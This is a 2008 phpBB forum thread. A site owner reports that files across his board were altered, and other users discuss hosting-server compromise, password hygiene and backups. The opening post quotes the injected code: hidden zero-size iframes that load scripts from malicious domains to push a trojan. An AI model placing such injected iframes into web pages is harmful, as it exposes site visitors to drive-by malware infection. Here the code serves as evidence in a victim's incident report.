Page 1 of 1

Found a trojan on my board

Posted: Thu Oct 02, 2008 5:41 pm
by Remon
The last couple of days, multiple visitors from my phpBB forum reporting to me that they get some strange request to install Realplayer and open PDF files.

That sounded strange to me, because HTML posting is disabled.

First i thought that the computers from the visitors where infected with spyware, trojans and other crap. But i'm getting over and over new reports, even from visitors with alternative browsers and Linux as the operating system.

So i decided to do some research, login with a FTP client to my host and this is what i found:

Infected files, all changed on september 28, exactly on 4:34:00 AM:

/index.php
/admin/index.php
/cache/index.htm
/db/index.htm
/docs/CHANGELOG.html
/docs/codingstandards.htm
/docs/FAQ.html
/docs/INSTALL.html
/docs/README.html
/images/index.htm
/images/avatars/index.htm
/images/avatars/galery/index.htm
/includes/index.htm
/includes/page_header.php
/language/index.htm
/language/dutch/index.htm
/language/dutch/email/index.htm
/language/english/index.htm
/language/english/email/index.htm
/templates/index.htm
/templates/subSilver/index.htm
/templates/subSilver/admin/index.htm
/templates/subSilver/images/index.htm
/templates/subSilver/index.htm
/templates/subSilver_old/admin/index.htm
/templates/subSilver_old/images/index.htm

With the following code added on the last line:

Code: Select all

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
While tried to download one of these files, my virusscanner (McAfee) detected the trojan "JS/Tenia.d".

All files has set the CHMOD to 644. Pretty save isn't it?

I have backups, i can put everything back to normal, but i'm afraid that this can be happen again. I've also contacted my hosting provider, maybe there's a trojan or worm into there servers.

This trojan is maybe writen to infect phpBB boards, because there is one stranger in the infected files, the page_header.php. That is typically a file for a phpBB board.

Other usefull information:
Board is running phpBB 2.0.23
Address is http://www.radiohobby.nl that is temporarily offline for above reasons.

Re: Found a trojan on my board

Posted: Thu Oct 02, 2008 5:53 pm
by JimA
Well, when I see this it seems to me that you're hacked. :(
Try to post a report in the Incident tracker and give all information you think that can help you and see what will happend and what they say.

Re: Found a trojan on my board

Posted: Thu Oct 02, 2008 7:01 pm
by Remon
I've found out that .htm/.html/.php files in non public folders on the server also are infected.

Have to wait now untill the hoster replies to me...

Re: Found a trojan on my board

Posted: Fri Oct 03, 2008 6:07 pm
by dkinzer
Remon wrote:I've found out that .htm/.html/.php files in non public folders on the server also are infected.
It is quite likely that you have a keylogger trojan or some other type of malware on the PC that you use to upload files to your host. By this means, the hackers can get your account's username/password and then modify files at will.

The first step is to change your account's master password and the password on all FTP logins that have the capability to modify files in the directories where you've found evidence. However, you must do this on a system that is known to be virus/trojan-free or it will be to no avail.

You should also review the state of your PC's security software. If it is outdated or if you are missing some key elements, you should take immediate steps to rectify that.

Re: Found a trojan on my board

Posted: Fri Oct 03, 2008 11:25 pm
by Remon
Everything is maximum secured on my PC's.

Today i did a phonecall to the hosting company, they told me that this issue is known and that over 50.000 pages are infected and 750 customers have the same problems as me...

They can't find the process that causes this, so they still searching. The CEO even came back early from his holiday...

In the meanwhile they also running a script that cut the iframe out all of the pages, but that's a temporary solution because the process can change the files again on every suddenly time.

Re: Found a trojan on my board

Posted: Sat Oct 04, 2008 2:12 am
by espicom
Classic sign of a compromised file manager on the server. The host didn't keep up with security updates, and someone managed to gain access to all files because of it. Older versions of cPanel have had this problem, and other file managers, too.

You're going to have to wait on the host, because anything you do is going to be overwritten by the next attack. The host has to secure the file manager and clean all the trojan horse programs out. I hope you have a recent, pre-attack backup of all your files and data, or that they do!

Re: Found a trojan on my board

Posted: Sat Oct 04, 2008 2:49 am
by Remon
Thanks for your kindly reply!

I have a backup for the files on the host, but is there any change that the database is infected? The last SQL backup i made is dated the 22nd of September. On 2 October i've disabled my board, that's meaning 10 days of lost... :(

Re: Found a trojan on my board

Posted: Sat Oct 04, 2008 4:13 am
by espicom
There is always a possibility, but the particular type of attack made (replacing index.* with infecting code) usually does not go after databases. It's a wild-card replacement of code, rather than specific programs to attack particular applications. Do a back up immediately, either way, because you can always clean out any infected messages or re-work any changed settings.

Re: Found a trojan on my board

Posted: Thu Oct 09, 2008 9:22 pm
by Remon
My host cleaned up all the files and they found a solution that this issue cannot happen again.

Re: Found a trojan on my board

Posted: Thu Oct 09, 2008 9:44 pm
by ric323
Remon wrote:My host cleaned up all the files and they found a solution that this issue cannot happen again.
That means that they finally updated their old copy of the CPANEL application.
(CPANEL fixed it over two years ago...)

Re: Found a trojan on my board

Posted: Fri Oct 10, 2008 2:51 pm
by Remon
I'm not sure about that.

They disabled the allow_url_include in the php.ini, because php scripts can't open external links/images anymore... The update checker in the ACP didn't work with that and my (upgraded to 3.0.2) board cannot get image information from external pictures to set the width and hight...

Another ticked is made for the customer support...

Re: Found a trojan on my board

Posted: Mon Oct 13, 2008 12:06 am
by espicom
You are right to be suspicious if they think disabling URL includes "fixes" the problem. Properly configured, even if PHP can include a URL outside the local machine, the web server should not be running at a privilege level that would allow it to overwrite any files that are not specifically set aside as "writable", nor would it be able to create any files outside of directories specifically set to allow that (i.e., the avatar upload directory, if you've enable that feature).

And yet, someone was able to overwrite index.php... which means whatever method allowed access, it was running NOT as the same user as the web server SHOULD be running (a non-privileged user).

Keep your backups VERY current. And shop for a host that knows how to deal with security.

Re: Found a trojan on my board

Posted: Mon Oct 13, 2008 2:13 am
by Remon
It's getting worse then worse, the host is blocking everything with a firewall. PhpBB cannot read picture sizes and returns an error to the members...

And i just paid like 200 euro for October 2008 to October 2009... :cry: